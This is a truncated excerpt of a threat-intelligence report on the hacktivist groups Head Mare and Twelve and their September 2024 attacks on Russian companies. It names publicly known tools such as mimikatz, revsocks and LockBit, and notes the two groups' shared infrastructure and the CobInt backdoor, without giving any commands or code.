Introduction
In September 2024, a series of attacks targeted Russian companies, revealing indicators of compromise and tactics associated with two hacktivist groups: Head Mare and Twelve. Our investigation showed that Head Mare relied heavily on tools previously associated with Twelve. Additionally, Head Mare attacks utilized command-and-control (C2) servers exclusively linked to Twelve prior to these incidents. This suggests potential collaboration and joint campaigns between the two groups.
The attackers continue to refine their methods, employing both familiar tools from past Head Mare incidents and new PowerShell-based tools.
This report analyzes the software and techniques observed in recent Head Mare attacks and how these overlap with Twelve’s activities. The focus is on Head Mare’s TTPs and their evolution, with notes on commonalities with Twelve’s TTPs.
Technical details
Head Mare’s toolkit
The attackers used various publicly available tools, including open-source software and leaked proprietary tools, to achieve their goals.
mimikatz;
ADRecon;
secretsdump;
ProcDump;
Localtonet;
revsocks;
ngrok;
cloudflared;
Gost;
fscan;
SoftPerfect Network Scanner;
mRemoteNG;
PSExec;
smbexec;
wmiexec;
LockBit 3.0;
Babuk.
Some of these tools were mentioned in our previous report on Head Mare, while others were new to their arsenal.
Notable new tools
Among the tools used by Head Mare were some not previously employed by the hacktivists but seen in attacks by other groups. For instance, they used the CobInt backdoor for remote access to domain controllers, previously observed only in Twelve’s attacks on Russian companies. This is an interesting fact, suggesting that Twelve and Head Mare ..
Support the originator by clicking the read the rest link below.
